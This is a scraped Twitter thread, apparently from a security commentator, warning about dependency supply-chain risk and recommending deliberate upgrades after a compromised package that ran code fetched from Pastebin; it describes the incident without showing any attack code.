If you're not rigorously auditing dependencies [+], you're as secure as the least secure account, application, or trusted application of the least secure person with commit access in your supply chain. [+] You are not. [++] [++] No, really, you are not.
-
-
Show this thread
-
A mitigation here, which you will probably want anyhow, is to only upgrade dependencies based on explicit choice rather than slurping down upgrades optimistically. This mitigation is not normative in some development communities, which may pose some cultural challenges.
Show this thread -
Having your application evaluate code grabbed from Pastebin at runtime [0] will *also* pose some cultural challenges, though. [0] The attack payload here.
Show this thread
End of conversation
New conversation -
-
-
Fortunately the 1.6 branch is older, and there are newer ones to choose from.
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.